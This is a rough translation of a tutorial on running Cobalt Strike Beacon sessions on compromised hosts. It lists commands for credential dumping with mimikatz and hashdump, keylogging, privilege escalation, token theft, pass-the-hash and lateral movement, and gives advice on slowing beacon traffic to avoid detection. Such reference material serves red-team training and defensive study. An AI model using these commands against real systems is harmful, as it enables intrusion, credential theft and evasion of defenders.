Through the learning of tutorial 2, configure the Listeners, let the target and execute our payload backdoor program, and then you can find that the target host is online
Right click the target selection to use Beacon, which we use to execute various commands
==In Cobalt Strike, his default heartbeat is 60s (that is, the sleep time is 60s, and the target host communicates with the team server every minute), which makes us slow to execute commands or perform other operations. It's very obvious in downloading files, so the response time is generally reduced, but it should not be too small in actual combat environment, otherwise the traffic will be particularly obvious==
Beacon is different from cmd in that many commands cannot be entered directly. For example, to view the ip address in cmd, you can directly enter ipconfig, but you need to enter shell ipconfig in beacon to view it. Don't dig here!
The commands that can be used directly in beacon are as follows:
Help: view help for all built-in commands of the beacon shell. How to view the usage of the specified command, eg:help checkin Note: give a name to the current directory machine, eg: note chicken1 shell cd: switch directories in the target system. Note that you need to use double slashes to switch directories in the win system, or use '/' eg: cd c:\ mkdir: create a new directory, eg: mkdir d:\beacon rm: delete file or directory, eg:rm d:\beacon Upload: upload files to the target system Download: download the specified file from the target system, eg:download C:\payload.txt Cancel: cancel the download task. For example, if a file is very large and the download time is very good, you can use this command to cancel the download in the middle Shell: execute the specified cmd command in the target system, eg:shell whoami getuid: view the user permissions of the current beacon session in the target system. If necessary, you need to raise the permissions. pwd: View paths in the current directory system ls: list all files and directories in the current directory drives: lists all partitions in the target system ps: view the current list of all processes in the target system Kill: kill the specified process. eg:kill 6453 Sleep: Specifies the sleep time of the controlled end. By default, the return time is 60s. You can use sleep 10 to modify the return time. In practice, it should not be too fast, or it is easy to be found. Generally, the return time is 80s jobs: list all tasks. Some tasks may take a little longer to execute. At this time, you can see the id of the corresponding specific task in the task list, and clear it specifically Jobkill: if you find that the task has not been executed or abnormal for a long time, you can use this command to end the task directly. eg:jobkill 3456 Clear: clear the task queue inside the beacon checkin: force the control end to connect back once exit: terminate the current beacon session ctrl + k: clear screen
The Chinese command is as follows:
Command Description ------- ----------- browserpivot Inject victim browser process bypassuac bypassUAC cancel Cancel download in progress cd Toggle directory checkin Force the accused end to connect once clear Eliminate beacon Internal task queue connect Connect to a Beacon peer over TCP covertvpn deploy Covert VPNClient cp Copy file dcsync fromDCExtract password hash in desktop Long-rangeVNC dllinject reflexDLLInjection process dllload Use LoadLibrary takeDLLLoad into process download Download File downloads List file downloads in progress drives List destination drive letters elevate Trying to raise power execute Execute program on target(No output) execute-assembly Execute local in memory on target.NETprogram exit Sign out beacon getprivs Enable system privileges on current token getsystem Try to getSYSTEMJurisdiction getuid Get usersID hashdump Dump password hash help Help inject Generate sessions in a specific process jobkill Kill a background task jobs List background tasks kerberos_ccache_use from ccache Import tickets from file to apply to this session kerberos_ticket_purge Clear ticket for current session kerberos_ticket_use from ticket Import tickets from file to apply to this session keylogger Keylogger kill End process link Connect to a Beacon peer over a named pipe logonpasswords Use mimikatz Dump credentials and hash values ls List files make_token Create token to pass credentials mimikatz Function mimikatz mkdir Create a directory mode dns UseDNS A As a communication channel(Only limitedDNS beacon) mode dns-txt UseDNS TXTAs a communication channel(Only limited D beacon) mode dns6 UseDNS AAAAAs a communication channel(Only limitedDNS beacon) mode http UseHTTPAs a communication channel mv move file net net command note Remarks portscan Port scan powerpick adopt Unmanaged PowerShell Executive order powershell adopt powershell.exe Executive order powershell-import Import powershell Script ppid Set parent PID for spawned post-ex jobs ps Show process list psexec Use a service to spawn a session on a host psexec_psh Use PowerShell to spawn a session on a host psinject Execute in a specific process PowerShell command pth Use Mimikatz To pass hash pwd Current directory location reg Query the registry rev2self Recover original token rm Delete files or folders rportfwd Port forwarding run Execute program on target(Return output) runas Execute the program with another user right runasadmin Execute program under high authority runu Execute a program under another PID screenshot Screenshots setenv Setting environment variables shell cmd Executive order shinject take shellcode Injection process shspawn Build the process and shellcode Injection into sleep Set sleep delay time socks start-upSOCKS4agent socks stop Stop itSOCKS4 spawn Spawn a session spawnas Spawn a session as another user spawnto Set executable to spawn processes into spawnu Spawn a session under another PID ssh Use ssh Connecting to a remote host ssh-key Connecting to a remote host with a key steal_token Steal token from process timestomp Apply a file timestamp to another file unlink Disconnect from parent Beacon upload Upload files wdigest Use mimikatz To store plaintext credentials winrm Use WinRM Generate session on host wmi UseWMIGenerate session on host argue Process parameter spoofing